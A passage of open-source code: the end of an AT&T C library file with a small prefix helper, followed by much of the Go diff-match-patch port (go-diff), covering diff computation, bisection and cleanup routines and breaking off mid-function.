* Eclipse Public License, Version 1.0 *
* by AT&T Intellectual Property *
* *
* A copy of the License is available at *
* http://www.eclipse.org/org/documents/epl-v10.html *
* (with md5 checksum b35adb5213ca9657e911e9befb180842) *
* *
* Information and Software Systems Research *
* AT&T Research *
* Florham Park NJ *
* *
* Glenn Fowler <[email protected]> *
* Phong Vo <[email protected]> *
* *
***********************************************************************/
#pragma prototyped
#include "ptvlib.h"
/*
* return the minimum prefix of a limited to m bits
*/
unsigned char*
ptvmin(int z, unsigned char* r, const unsigned char* a, int m)
{
return fvplo(z, m, r, a);
}
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2012-2016 The go-diff authors. All rights reserved.
// https://github.com/sergi/go-diff
// See the included LICENSE file for license details.
//
// go-diff is a Go implementation of Google's Diff, Match, and Patch library
// Original library is Copyright (c) 2006 Google Inc.
// http://code.google.com/p/google-diff-match-patch/
package diffmatchpatch
import (
"bytes"
"errors"
"fmt"
"html"
"math"
"net/url"
"regexp"
"strconv"
"strings"
"time"
"unicode/utf8"
)
// Operation defines the operation of a diff item.
type Operation int8
const (
// DiffDelete item represents a delete diff.
DiffDelete Operation = -1
// DiffInsert item represents an insert diff.
DiffInsert Operation = 1
// DiffEqual item represents an equal diff.
DiffEqual Operation = 0
)
// Diff represents one diff operation
type Diff struct {
Type Operation
Text string
}
func splice(slice []Diff, index int, amount int, elements ...Diff) []Diff {
return append(slice[:index], append(elements, slice[index+amount:]...)...)
}
// DiffMain finds the differences between two texts.
// If an invalid UTF-8 sequence is encountered, it will be replaced by the Unicode replacement character.
func (dmp *DiffMatchPatch) DiffMain(text1, text2 string, checklines bool) []Diff {
return dmp.DiffMainRunes([]rune(text1), []rune(text2), checklines)
}
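// Illustrative usage sketch (not part of the original source): typical
// client-side use of DiffMain. It assumes the package's New constructor,
// which returns a DiffMatchPatch with default settings.
//
//	dmp := diffmatchpatch.New()
//	diffs := dmp.DiffMain("good dog", "bad dog", false)
//	for _, d := range diffs {
//		fmt.Printf("%d %q\n", d.Type, d.Text)
//	}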
// DiffMainRunes finds the differences between two rune sequences.
// If an invalid UTF-8 sequence is encountered, it will be replaced by the Unicode replacement character.
func (dmp *DiffMatchPatch) DiffMainRunes(text1, text2 []rune, checklines bool) []Diff {
var deadline time.Time
if dmp.DiffTimeout > 0 {
deadline = time.Now().Add(dmp.DiffTimeout)
}
return dmp.diffMainRunes(text1, text2, checklines, deadline)
}
func (dmp *DiffMatchPatch) diffMainRunes(text1, text2 []rune, checklines bool, deadline time.Time) []Diff {
if runesEqual(text1, text2) {
var diffs []Diff
if len(text1) > 0 {
diffs = append(diffs, Diff{DiffEqual, string(text1)})
}
return diffs
}
// Trim off common prefix (speedup).
commonlength := commonPrefixLength(text1, text2)
commonprefix := text1[:commonlength]
text1 = text1[commonlength:]
text2 = text2[commonlength:]
// Trim off common suffix (speedup).
commonlength = commonSuffixLength(text1, text2)
commonsuffix := text1[len(text1)-commonlength:]
text1 = text1[:len(text1)-commonlength]
text2 = text2[:len(text2)-commonlength]
// Compute the diff on the middle block.
diffs := dmp.diffCompute(text1, text2, checklines, deadline)
// Restore the prefix and suffix.
if len(commonprefix) != 0 {
diffs = append([]Diff{Diff{DiffEqual, string(commonprefix)}}, diffs...)
}
if len(commonsuffix) != 0 {
diffs = append(diffs, Diff{DiffEqual, string(commonsuffix)})
}
return dmp.DiffCleanupMerge(diffs)
}
// diffCompute finds the differences between two rune slices. Assumes that the texts do not have any common prefix or suffix.
func (dmp *DiffMatchPatch) diffCompute(text1, text2 []rune, checklines bool, deadline time.Time) []Diff {
diffs := []Diff{}
if len(text1) == 0 {
// Just add some text (speedup).
return append(diffs, Diff{DiffInsert, string(text2)})
} else if len(text2) == 0 {
// Just delete some text (speedup).
return append(diffs, Diff{DiffDelete, string(text1)})
}
var longtext, shorttext []rune
if len(text1) > len(text2) {
longtext = text1
shorttext = text2
} else {
longtext = text2
shorttext = text1
}
if i := runesIndex(longtext, shorttext); i != -1 {
op := DiffInsert
// Swap insertions for deletions if diff is reversed.
if len(text1) > len(text2) {
op = DiffDelete
}
// Shorter text is inside the longer text (speedup).
return []Diff{
Diff{op, string(longtext[:i])},
Diff{DiffEqual, string(shorttext)},
Diff{op, string(longtext[i+len(shorttext):])},
}
} else if len(shorttext) == 1 {
// Single character string.
// After the previous speedup, the character can't be an equality.
return []Diff{
Diff{DiffDelete, string(text1)},
Diff{DiffInsert, string(text2)},
}
// Check to see if the problem can be split in two.
} else if hm := dmp.diffHalfMatch(text1, text2); hm != nil {
// A half-match was found, sort out the return data.
text1A := hm[0]
text1B := hm[1]
text2A := hm[2]
text2B := hm[3]
midCommon := hm[4]
// Send both pairs off for separate processing.
diffsA := dmp.diffMainRunes(text1A, text2A, checklines, deadline)
diffsB := dmp.diffMainRunes(text1B, text2B, checklines, deadline)
// Merge the results.
return append(diffsA, append([]Diff{Diff{DiffEqual, string(midCommon)}}, diffsB...)...)
} else if checklines && len(text1) > 100 && len(text2) > 100 {
return dmp.diffLineMode(text1, text2, deadline)
}
return dmp.diffBisect(text1, text2, deadline)
}
// diffLineMode does a quick line-level diff on both []runes, then rediffs the parts for greater accuracy. This speedup can produce non-minimal diffs.
func (dmp *DiffMatchPatch) diffLineMode(text1, text2 []rune, deadline time.Time) []Diff {
// Scan the text on a line-by-line basis first.
text1, text2, linearray := dmp.diffLinesToRunes(text1, text2)
diffs := dmp.diffMainRunes(text1, text2, false, deadline)
// Convert the diff back to original text.
diffs = dmp.DiffCharsToLines(diffs, linearray)
// Eliminate freak matches (e.g. blank lines)
diffs = dmp.DiffCleanupSemantic(diffs)
// Rediff any replacement blocks, this time character-by-character.
// Add a dummy entry at the end.
diffs = append(diffs, Diff{DiffEqual, ""})
pointer := 0
countDelete := 0
countInsert := 0
// NOTE: Rune slices are slower than using strings in this case.
textDelete := ""
textInsert := ""
for pointer < len(diffs) {
switch diffs[pointer].Type {
case DiffInsert:
countInsert++
textInsert += diffs[pointer].Text
case DiffDelete:
countDelete++
textDelete += diffs[pointer].Text
case DiffEqual:
// Upon reaching an equality, check for prior redundancies.
if countDelete >= 1 && countInsert >= 1 {
// Delete the offending records and add the merged ones.
diffs = splice(diffs, pointer-countDelete-countInsert,
countDelete+countInsert)
pointer = pointer - countDelete - countInsert
a := dmp.diffMainRunes([]rune(textDelete), []rune(textInsert), false, deadline)
for j := len(a) - 1; j >= 0; j-- {
diffs = splice(diffs, pointer, 0, a[j])
}
pointer = pointer + len(a)
}
countInsert = 0
countDelete = 0
textDelete = ""
textInsert = ""
}
pointer++
}
return diffs[:len(diffs)-1] // Remove the dummy entry at the end.
}
// DiffBisect finds the 'middle snake' of a diff, splits the problem in two and returns the recursively constructed diff.
// If an invalid UTF-8 sequence is encountered, it will be replaced by the Unicode replacement character.
// See Myers's 1986 paper: An O(ND) Difference Algorithm and Its Variations.
func (dmp *DiffMatchPatch) DiffBisect(text1, text2 string, deadline time.Time) []Diff {
// Unused in this code, but retained for interface compatibility.
return dmp.diffBisect([]rune(text1), []rune(text2), deadline)
}
// diffBisect finds the 'middle snake' of a diff, splits the problem in two and returns the recursively constructed diff.
// See Myers's 1986 paper: An O(ND) Difference Algorithm and Its Variations.
func (dmp *DiffMatchPatch) diffBisect(runes1, runes2 []rune, deadline time.Time) []Diff {
// Cache the text lengths to prevent multiple calls.
runes1Len, runes2Len := len(runes1), len(runes2)
maxD := (runes1Len + runes2Len + 1) / 2
vOffset := maxD
vLength := 2 * maxD
v1 := make([]int, vLength)
v2 := make([]int, vLength)
for i := range v1 {
v1[i] = -1
v2[i] = -1
}
v1[vOffset+1] = 0
v2[vOffset+1] = 0
delta := runes1Len - runes2Len
// If the total number of characters is odd, then the front path will collide with the reverse path.
front := (delta%2 != 0)
// Offsets for start and end of k loop. Prevents mapping of space beyond the grid.
k1start := 0
k1end := 0
k2start := 0
k2end := 0
for d := 0; d < maxD; d++ {
// Bail out if deadline is reached.
if !deadline.IsZero() && time.Now().After(deadline) {
break
}
// Walk the front path one step.
for k1 := -d + k1start; k1 <= d-k1end; k1 += 2 {
k1Offset := vOffset + k1
var x1 int
if k1 == -d || (k1 != d && v1[k1Offset-1] < v1[k1Offset+1]) {
x1 = v1[k1Offset+1]
} else {
x1 = v1[k1Offset-1] + 1
}
y1 := x1 - k1
for x1 < runes1Len && y1 < runes2Len {
if runes1[x1] != runes2[y1] {
break
}
x1++
y1++
}
v1[k1Offset] = x1
if x1 > runes1Len {
// Ran off the right of the graph.
k1end += 2
} else if y1 > runes2Len {
// Ran off the bottom of the graph.
k1start += 2
} else if front {
k2Offset := vOffset + delta - k1
if k2Offset >= 0 && k2Offset < vLength && v2[k2Offset] != -1 {
// Mirror x2 onto top-left coordinate system.
x2 := runes1Len - v2[k2Offset]
if x1 >= x2 {
// Overlap detected.
return dmp.diffBisectSplit(runes1, runes2, x1, y1, deadline)
}
}
}
}
// Walk the reverse path one step.
for k2 := -d + k2start; k2 <= d-k2end; k2 += 2 {
k2Offset := vOffset + k2
var x2 int
if k2 == -d || (k2 != d && v2[k2Offset-1] < v2[k2Offset+1]) {
x2 = v2[k2Offset+1]
} else {
x2 = v2[k2Offset-1] + 1
}
var y2 = x2 - k2
for x2 < runes1Len && y2 < runes2Len {
if runes1[runes1Len-x2-1] != runes2[runes2Len-y2-1] {
break
}
x2++
y2++
}
v2[k2Offset] = x2
if x2 > runes1Len {
// Ran off the left of the graph.
k2end += 2
} else if y2 > runes2Len {
// Ran off the top of the graph.
k2start += 2
} else if !front {
k1Offset := vOffset + delta - k2
if k1Offset >= 0 && k1Offset < vLength && v1[k1Offset] != -1 {
x1 := v1[k1Offset]
y1 := vOffset + x1 - k1Offset
// Mirror x2 onto top-left coordinate system.
x2 = runes1Len - x2
if x1 >= x2 {
// Overlap detected.
return dmp.diffBisectSplit(runes1, runes2, x1, y1, deadline)
}
}
}
}
}
// Diff took too long and hit the deadline or number of diffs equals number of characters, no commonality at all.
return []Diff{
Diff{DiffDelete, string(runes1)},
Diff{DiffInsert, string(runes2)},
}
}
func (dmp *DiffMatchPatch) diffBisectSplit(runes1, runes2 []rune, x, y int,
deadline time.Time) []Diff {
runes1a := runes1[:x]
runes2a := runes2[:y]
runes1b := runes1[x:]
runes2b := runes2[y:]
// Compute both diffs serially.
diffs := dmp.diffMainRunes(runes1a, runes2a, false, deadline)
diffsb := dmp.diffMainRunes(runes1b, runes2b, false, deadline)
return append(diffs, diffsb...)
}
// DiffLinesToChars splits two texts into a list of strings, and reduces the texts to a string of hashes where each Unicode character represents one line.
// It's slightly faster to call DiffLinesToRunes first, followed by DiffMainRunes.
func (dmp *DiffMatchPatch) DiffLinesToChars(text1, text2 string) (string, string, []string) {
chars1, chars2, lineArray := dmp.DiffLinesToRunes(text1, text2)
return string(chars1), string(chars2), lineArray
}
// DiffLinesToRunes splits two texts into a list of runes. Each rune represents one line.
func (dmp *DiffMatchPatch) DiffLinesToRunes(text1, text2 string) ([]rune, []rune, []string) {
// '\x00' is a valid character, but various debuggers don't like it. So we'll insert a junk entry to avoid generating a null character.
lineArray := []string{""} // e.g. lineArray[4] == 'Hello\n'
lineHash := map[string]int{} // e.g. lineHash['Hello\n'] == 4
chars1 := dmp.diffLinesToRunesMunge(text1, &lineArray, lineHash)
chars2 := dmp.diffLinesToRunesMunge(text2, &lineArray, lineHash)
return chars1, chars2, lineArray
}
func (dmp *DiffMatchPatch) diffLinesToRunes(text1, text2 []rune) ([]rune, []rune, []string) {
return dmp.DiffLinesToRunes(string(text1), string(text2))
}
// diffLinesToRunesMunge splits a text into an array of strings, and reduces the texts to a []rune where each Unicode character represents one line.
// We use strings instead of []runes as input mainly because you can't use []rune as a map key.
func (dmp *DiffMatchPatch) diffLinesToRunesMunge(text string, lineArray *[]string, lineHash map[string]int) []rune {
// Walk the text, pulling out a substring for each line. text.split('\n') would temporarily double our memory footprint. Modifying text would create many large strings to garbage collect.
lineStart := 0
lineEnd := -1
runes := []rune{}
for lineEnd < len(text)-1 {
lineEnd = indexOf(text, "\n", lineStart)
if lineEnd == -1 {
lineEnd = len(text) - 1
}
line := text[lineStart : lineEnd+1]
lineStart = lineEnd + 1
lineValue, ok := lineHash[line]
if ok {
runes = append(runes, rune(lineValue))
} else {
*lineArray = append(*lineArray, line)
lineHash[line] = len(*lineArray) - 1
runes = append(runes, rune(len(*lineArray)-1))
}
}
return runes
}
// DiffCharsToLines rehydrates the text in a diff from a string of line hashes to real lines of text.
func (dmp *DiffMatchPatch) DiffCharsToLines(diffs []Diff, lineArray []string) []Diff {
hydrated := make([]Diff, 0, len(diffs))
for _, aDiff := range diffs {
chars := aDiff.Text
text := make([]string, len(chars))
for i, r := range chars {
text[i] = lineArray[r]
}
aDiff.Text = strings.Join(text, "")
hydrated = append(hydrated, aDiff)
}
return hydrated
}
// DiffCommonPrefix determines the common prefix length of two strings.
func (dmp *DiffMatchPatch) DiffCommonPrefix(text1, text2 string) int {
// Unused in this code, but retained for interface compatibility.
return commonPrefixLength([]rune(text1), []rune(text2))
}
// DiffCommonSuffix determines the common suffix length of two strings.
func (dmp *DiffMatchPatch) DiffCommonSuffix(text1, text2 string) int {
// Unused in this code, but retained for interface compatibility.
return commonSuffixLength([]rune(text1), []rune(text2))
}
// commonPrefixLength returns the length of the common prefix of two rune slices.
func commonPrefixLength(text1, text2 []rune) int {
short, long := text1, text2
if len(short) > len(long) {
short, long = long, short
}
for i, r := range short {
if r != long[i] {
return i
}
}
return len(short)
}
// commonSuffixLength returns the length of the common suffix of two rune slices.
func commonSuffixLength(text1, text2 []rune) int {
n := min(len(text1), len(text2))
for i := 0; i < n; i++ {
if text1[len(text1)-i-1] != text2[len(text2)-i-1] {
return i
}
}
return n
// TODO research and benchmark this, why is it not activated? https://github.com/sergi/go-diff/issues/54
// Binary search.
// Performance analysis: http://neil.fraser.name/news/2007/10/09/
/*
pointermin := 0
pointermax := math.Min(len(text1), len(text2))
pointermid := pointermax
pointerend := 0
for pointermin < pointermid {
if text1[len(text1)-pointermid:len(text1)-pointerend] ==
text2[len(text2)-pointermid:len(text2)-pointerend] {
pointermin = pointermid
pointerend = pointermin
} else {
pointermax = pointermid
}
pointermid = math.Floor((pointermax-pointermin)/2 + pointermin)
}
return pointermid
*/
}
// DiffCommonOverlap determines if the suffix of one string is the prefix of another.
func (dmp *DiffMatchPatch) DiffCommonOverlap(text1 string, text2 string) int {
// Cache the text lengths to prevent multiple calls.
text1Length := len(text1)
text2Length := len(text2)
// Eliminate the null case.
if text1Length == 0 || text2Length == 0 {
return 0
}
// Truncate the longer string.
if text1Length > text2Length {
text1 = text1[text1Length-text2Length:]
} else if text1Length < text2Length {
text2 = text2[0:text1Length]
}
textLength := int(math.Min(float64(text1Length), float64(text2Length)))
// Quick check for the worst case.
if text1 == text2 {
return textLength
}
// Start by looking for a single character match and increase length until no match is found. Performance analysis: http://neil.fraser.name/news/2010/11/04/
best := 0
length := 1
for {
pattern := text1[textLength-length:]
found := strings.Index(text2, pattern)
if found == -1 {
break
}
length += found
if found == 0 || text1[textLength-length:] == text2[0:length] {
best = length
length++
}
}
return best
}
// DiffHalfMatch checks whether the two texts share a substring which is at least half the length of the longer text. This speedup can produce non-minimal diffs.
func (dmp *DiffMatchPatch) DiffHalfMatch(text1, text2 string) []string {
// Unused in this code, but retained for interface compatibility.
runeSlices := dmp.diffHalfMatch([]rune(text1), []rune(text2))
if runeSlices == nil {
return nil
}
result := make([]string, len(runeSlices))
for i, r := range runeSlices {
result[i] = string(r)
}
return result
}
func (dmp *DiffMatchPatch) diffHalfMatch(text1, text2 []rune) [][]rune {
if dmp.DiffTimeout <= 0 {
// Don't risk returning a non-optimal diff if we have unlimited time.
return nil
}
var longtext, shorttext []rune
if len(text1) > len(text2) {
longtext = text1
shorttext = text2
} else {
longtext = text2
shorttext = text1
}
if len(longtext) < 4 || len(shorttext)*2 < len(longtext) {
return nil // Pointless.
}
// First check if the second quarter is the seed for a half-match.
hm1 := dmp.diffHalfMatchI(longtext, shorttext, int(float64(len(longtext)+3)/4))
// Check again based on the third quarter.
hm2 := dmp.diffHalfMatchI(longtext, shorttext, int(float64(len(longtext)+1)/2))
hm := [][]rune{}
if hm1 == nil && hm2 == nil {
return nil
} else if hm2 == nil {
hm = hm1
} else if hm1 == nil {
hm = hm2
} else {
// Both matched. Select the longest.
if len(hm1[4]) > len(hm2[4]) {
hm = hm1
} else {
hm = hm2
}
}
// A half-match was found, sort out the return data.
if len(text1) > len(text2) {
return hm
}
return [][]rune{hm[2], hm[3], hm[0], hm[1], hm[4]}
}
// diffHalfMatchI checks if a substring of shorttext exists within longtext such that the substring is at least half the length of longtext.
// Returns a slice containing the prefix of longtext, the suffix of longtext, the prefix of shorttext, the suffix of shorttext and the common middle, or nil if there was no match.
func (dmp *DiffMatchPatch) diffHalfMatchI(l, s []rune, i int) [][]rune {
var bestCommonA []rune
var bestCommonB []rune
var bestCommonLen int
var bestLongtextA []rune
var bestLongtextB []rune
var bestShorttextA []rune
var bestShorttextB []rune
// Start with a 1/4 length substring at position i as a seed.
seed := l[i : i+len(l)/4]
for j := runesIndexOf(s, seed, 0); j != -1; j = runesIndexOf(s, seed, j+1) {
prefixLength := commonPrefixLength(l[i:], s[j:])
suffixLength := commonSuffixLength(l[:i], s[:j])
if bestCommonLen < suffixLength+prefixLength {
bestCommonA = s[j-suffixLength : j]
bestCommonB = s[j : j+prefixLength]
bestCommonLen = len(bestCommonA) + len(bestCommonB)
bestLongtextA = l[:i-suffixLength]
bestLongtextB = l[i+prefixLength:]
bestShorttextA = s[:j-suffixLength]
bestShorttextB = s[j+prefixLength:]
}
}
if bestCommonLen*2 < len(l) {
return nil
}
return [][]rune{
bestLongtextA,
bestLongtextB,
bestShorttextA,
bestShorttextB,
append(bestCommonA, bestCommonB...),
}
}
// DiffCleanupSemantic reduces the number of edits by eliminating semantically trivial equalities.
func (dmp *DiffMatchPatch) DiffCleanupSemantic(diffs []Diff) []Diff {
changes := false
// Stack of indices where equalities are found.
type equality struct {
data int
next *equality
}
var equalities *equality
var lastequality string
// Always equal to diffs[equalities.data].Text (the text of the last equality seen).
var pointer int // Index of current position.
// Number of characters that changed prior to the equality.
var lengthInsertions1, lengthDeletions1 int
// Number of characters that changed after the equality.
var lengthInsertions2, lengthDeletions2 int
for pointer < len(diffs) {
if diffs[pointer].Type == DiffEqual {
// Equality found.
equalities = &equality{
data: pointer,
next: equalities,
}
lengthInsertions1 = lengthInsertions2
lengthDeletions1 = lengthDeletions2
lengthInsertions2 = 0
lengthDeletions2 = 0
lastequality = diffs[pointer].Text
} else {
// An insertion or deletion.
if diffs[pointer].Type == DiffInsert {
lengthInsertions2 += len(diffs[pointer].Text)
} else {
lengthDeletions2 += len(diffs[pointer].Text)
}
// Eliminate an equality that is smaller or equal to the edits on both sides of it.
difference1 := int(math.Max(float64(lengthInsertions1), float64(lengthDeletions1)))
difference2 := int(math.Max(float64(lengthInsertions2), float64(lengthDeletions2)))
if len(lastequality) > 0 &&
(len(lastequality) <= difference1) &&
(len(lastequality) <= difference2) {
// Duplicate record.
insPoint := equalities.data
diffs = append(
diffs[:insPoint],
append([]Diff{Diff{DiffDelete, lastequality}}, diffs[insPoint:]...)...)
// Change second copy to insert.
diffs[insPoint+1].Type = DiffInsert
// Throw away the equality we just deleted.
equalities = equalities.next
if equalities != nil {
equalities = equalities.next
}
if equalities != nil {
pointer = equalities.data
} else {
pointer = -1
}
lengthInsertions1 = 0 // Reset the counters.
lengthDeletions1 = 0
lengthInsertions2 = 0
lengthDeletions2 = 0
lastequality = ""
changes = true
}
}
pointer++
}
// Normalize the diff.
if changes {
diffs = dmp.DiffCleanupMerge(diffs)
}
diffs = dmp.DiffCleanupSemanticLossless(diffs)
// Find any overlaps between deletions and insertions.
// e.g: <del>abcxxx</del><ins>xxxdef</ins>
// -> <del>abc</del>xxx<ins>def</ins>
// e.g: <del>xxxabc</del><ins>defxxx</ins>
// -> <ins>def</ins>xxx<del>abc</del>
// Only extract an overlap if it is as big as the edit ahead or behind it.
pointer = 1
for pointer < len(diffs) {
if diffs[pointer-1].Type == DiffDelete &&
diffs[pointer].Type == DiffInsert {
deletion := diffs[pointer-1].Text
insertion := diffs[pointer].Text
overlapLength1 := dmp.DiffCommonOverlap(deletion, insertion)
overlapLength2 := dmp.DiffCommonOverlap(insertion, deletion)
if overlapLength1 >= overlapLength2 {
if float64(overlapLength1) >= float64(len(deletion))/2 ||
float64(overlapLength1) >= float64(len(insertion))/2 {
// Overlap found. Insert an equality and trim the surrounding edits.
diffs = append(
diffs[:pointer],
append([]Diff{Diff{DiffEqual, insertion[:overlapLength1]}}, diffs[pointer:]...)...)
diffs[pointer-1].Text =
deletion[0 : len(deletion)-overlapLength1]
diffs[pointer+1].Text = insertion[overlapLength1:]
pointer++
}
} else {
if float64(overlapLength2) >= float64(len(deletion))/2 ||
float64(overlapLength2) >= float64(len(insertion))/2 {
// Reverse overlap found. Insert an equality and swap and trim the surrounding edits.
overlap := Diff{DiffEqual, deletion[:overlapLength2]}
diffs = append(
diffs[:pointer],
append([]Diff{overlap}, diffs[pointer:]...)...)
diffs[pointer-1].Type = DiffInsert
diffs[pointer-1].Text = insertion[0 : len(insertion)-overlapLength2]
diffs[pointer+1].Type = DiffDelete
diffs[pointer+1].Text = deletion[overlapLength2:]
pointer++
}
}
pointer++
}
pointer++
}
return diffs
}
// Define some regex patterns for matching boundaries.
var (
nonAlphaNumericRegex = regexp.MustCompile(`[^a-zA-Z0-9]`)
whitespaceRegex = regexp.MustCompile(`\s`)
linebreakRegex = regexp.MustCompile(`[\r\n]`)
blanklineEndRegex = regexp.MustCompile(`\n\r?\n$`)
blanklineStartRegex = regexp.MustCompile(`^\r?\n\r?\n`)
)
// diffCleanupSemanticScore computes a score representing whether the internal boundary falls on logical boundaries.
// Scores range from 6 (best) to 0 (worst). The function is self-contained and does not reference any external variables.
func diffCleanupSemanticScore(one, two string) int {
if len(one) == 0 || len(two) == 0 {
// Edges are the best.
return 6
}
// Each port of this function behaves slightly differently due to subtle differences in each language's definition of things like 'whitespace'. Since this function's purpose is largely cosmetic, the choice has been made to use each language's native features rather than force total conformity.
rune1, _ := utf8.DecodeLastRuneInString(one)
rune2, _ := utf8.DecodeRuneInString(two)
char1 := string(rune1)
char2 := string(rune2)
nonAlphaNumeric1 := nonAlphaNumericRegex.MatchString(char1)
nonAlphaNumeric2 := nonAlphaNumericRegex.MatchString(char2)
whitespace1 := nonAlphaNumeric1 && whitespaceRegex.MatchString(char1)
whitespace2 := nonAlphaNumeric2 && whitespaceRegex.MatchString(char2)
lineBreak1 := whitespace1 && linebreakRegex.MatchString(char1)
lineBreak2 := whitespace2 && linebreakRegex.MatchString(char2)
blankLine1 := lineBreak1 && blanklineEndRegex.MatchString(one)
blankLine2 := lineBreak2 && blanklineEndRegex.MatchString(two)
if blankLine1 || blankLine2 {
// Five points for blank lines.
return 5
} else if lineBreak1 || lineBreak2 {
// Four points for line breaks.
return 4
} else if nonAlphaNumeric1 && !whitespace1 && whitespace2 {
// Three points for end of sentences.
return 3
} else if whitespace1 || whitespace2 {
// Two points for whitespace.
return 2
} else if nonAlphaNumeric1 || nonAlphaNumeric2 {
// One point for non-alphanumeric.
return 1
}
return 0
}
// DiffCleanupSemanticLossless looks for single edits surrounded on both sides by equalities which can be shifted sideways to align the edit to a word boundary.
// E.g: The c<ins>at c</ins>ame. -> The <ins>cat </ins>came.
func (dmp *DiffMatchPatch) DiffCleanupSemanticLossless(diffs []Diff) []Diff {
pointer := 1
// Intentionally ignore the first and last element (don't need checking).
for pointer < len(diffs)-1 {
if diffs[pointer-1].Type == DiffEqual &&
diffs[pointer+1].Type == DiffEqual {
// This is a single edit surrounded by equalities.
equality1 := diffs[pointer-1].Text
edit := diffs[pointer].Text
equality2 := diffs[pointer+1].Text
// First, shift the edit as far left as possible.
commonOffset := dmp.DiffCommonSuffix(equality1, edit)
if commonOffset > 0 {
commonString := edit[len(edit)-commonOffset:]
equality1 = equality1[0 : len(equality1)-commonOffset]
edit = commonString + edit[:len(edit)-commonOffset]
equality2 = commonString + equality2
}
// Second, step character by character right, looking for the best fit.
bestEquality1 := equality1
bestEdit := edit
bestEquality2 := equality2
bestScore := diffCleanupSemanticScore(equality1, edit) +
diffCleanupSemanticScore(edit, equality2)
for len(edit) != 0 && len(equality2) != 0 {
_, sz := utf8.DecodeRuneInString(edit)
if len(equality2) < sz || edit[:sz] != equality2[:sz] {
break
}
equality1 += edit[:sz]
edit = edit[sz:] + equality2[:sz]
equality2 = equality2[sz:]
score := diffCleanupSemanticScore(equality1, edit) +
diffCleanupSemanticScore(edit, equality2)
// The >= encourages trailing rather than leading whitespace on edits.
if score >= bestScore {
bestScore = score
bestEquality1 = equality1
bestEdit = edit
bestEquality2 = equality2
}
}
if diffs[pointer-1].Text != bestEquality1 {
// We have an improvement, save it back to the diff.
if len(bestEquality1) != 0 {
diffs[pointer-1].Text = bestEquality1
} else {
diffs = splice(diffs, pointer-1, 1)
pointer--
}
diffs[pointer].Text = bestEdit
if len(bestEquality2) != 0 {
diffs[pointer+1].Text = bestEquality2
} else {
diffs = append(diffs[:pointer+1], diffs[pointer+2:]...)
pointer--
}
}
}
pointer++
}
return diffs
}
// DiffCleanupEfficiency reduces the number of edits by eliminating operationally trivial equalities.
func (dmp *DiffMatchPatch) DiffCleanupEfficiency(diffs []Diff) []Diff {
changes := false
// Stack of indices where equalities are found.
type equality struct {
data int
next *equality
}
var equalities *equality
// Always equal to diffs[equalities.data].Text (the text of the last candidate equality).
lastequality := ""
pointer := 0 // Index of current position.
// Is there an insertion operation before the last equality.
preIns := false
// Is there a deletion operation before the last equality.
preDel := false
// Is there an insertion operation after the last equality.
postIns := false
// Is there a deletion operation after the last equality.
postDel := false
for pointer < len(diffs) {
if diffs[pointer].Type == DiffEqual { // Equality found.
if len(diffs[pointer].Text) < dmp.DiffEditCost &&
(postIns || postDel) {
// Candidate found.
equalities = &equality{
data: pointer,
next: equalities,
}
preIns = postIns
preDel = postDel
lastequality = diffs[pointer].Text
} else {
// Not a candidate, and can never become one.
equalities = nil
lastequality = ""
}
postIns = false
postDel = false
} else { // An insertion or deletion.
if diffs[pointer].Type == DiffDelete {
postDel = true
} else {
postIns = true
}
// Five types to be split:
// <ins>A</ins><del>B</del>XY<ins>C</ins><del>D</del>
// <ins>A</ins>X<ins>C</ins><del>D</del>
// <ins>A</ins><del>B</del>X<ins>C</ins>
// <del>A</del>X<ins>C</ins><del>D</del>
// <ins>A</ins><del>B</del>X<del>C</del>
var sumPres int
if preIns {
sumPres++
}
if preDel {
sumPres++
}
if postIns {
sumPres++
}
if postDel {
sumPres++
}
if len(lastequality) > 0 &&
((preIns && preDel && postIns && postDel) ||
((len(lastequality) < dmp.DiffEditCost/2) && sumPres == 3)) {
insPoint := equalities.data
// Duplicate record.
diffs = append(diffs[:insPoint],
append([]Diff{Diff{DiffDelete, lastequality}}, diffs[insPoint:]...)...)
// Change second copy to insert.
diffs[insPoint+1].Type = DiffInsert
// Throw away the equality we just deleted.
equalities = equalities.next
lastequality = ""
if preIns && preDel {
// No changes made which could affect previous entry, keep going.
postIns = true
postDel = true
equalities = nil
} else {
if equalities != nil {
equalities = equalities.next
}
if equalities != nil {
pointer = equalities.data
} else {
pointer = -1
}
postIns = false
postDel = false
}
changes = true
}
}
pointer++
}
if changes {
diffs = dmp.DiffCleanupMerge(diffs)
}
return diffs
}
// DiffCleanupMerge reorders and merges like edit sections. Merge equalities.
// Any edit section can move as long as it doesn't cross an equality.
func (dmp *DiffMatchPatch) DiffCleanupMerge(diffs []Diff) []Diff {
// Add a dummy entry at the end.
diffs = append(diffs, Diff{DiffEqual, ""})
pointer := 0
countDelete := 0
countInsert := 0
commonlength := 0
textDelete := []rune(nil)
textInsert := []rune(nil)
for pointer < len(diffs) {
switch diffs[pointer].Type {
case DiffInsert:
countInsert++
textInsert = append(textInsert, []rune(diffs[pointer].Text)...)
pointer++
break
case DiffDelete:
countDelete++
textDelete = append(textDelete, []rune(diffs[pointer].Text)...)
pointer++
break
case DiffEqual:
// Upon reaching an equality, check for prior redundancies.
if countDelete+countInsert > 1 {
if countDelete != 0 && countInsert != 0 {
// Factor out any common prefixes.
commonlength = commonPrefixLength(textInsert, textDelete)
if commonlength != 0 {
x := pointer - countDelete - countInsert
if x > 0 && diffs[x-1].Type == DiffEqual {
diffs[x-1].Text += string(textInsert[:commonlength])
} else {
diffs = append([]Diff{Diff{DiffEqual, string(textInsert[:commonlength])}}, diffs...)
pointer++
}
textInsert = textInsert[commonlength:]
textDelete = textDelete[commonlength:]
}
// Factor out any common suffixes.
commonlength = commonSuffixLength(textInsert, textDelete)
if commonlength != 0 {
insertIndex := len(textInsert) - commonlength
deleteIndex := len(textDelete) - commonlength
diffs[pointer].Text = string(textInsert[insertIndex:]) + diffs[pointer].Text
textInsert = textInsert[:insertIndex]
textDelete = textDelete[:deleteIndex]
}
}
// Delete the offending records and add the merged ones.
if countDelete == 0 {
diffs = splice(diffs, pointer-countInsert,
countDelete+countInsert,
Diff{DiffInsert, string(textInsert)})
} else if countInsert == 0 {
diffs = splice(diffs, pointer-countDelete,
countDelete+countInsert,
Diff{DiffDelete, string(textDelete)})
} else {
diffs = splice(diffs, pointer-countDelete-countInsert,
countDelete+countInsert,
Diff{DiffDelete, string(textDelete)},
Diff{DiffInsert, string(textInsert)})
}
pointer = pointer - countDelete - countInsert + 1
if countDelete != 0 {
pointer++
}
if countInsert != 0 {
pointer++
}
} else if pointer != 0 && diffs[pointer-1].Type == DiffEqual {
// Merge this equality with the previous one.
diffs[pointer-1].Text += diffs[pointer].Text
diffs = append(diffs[:pointer], diffs[pointer+1:]...)
} else {
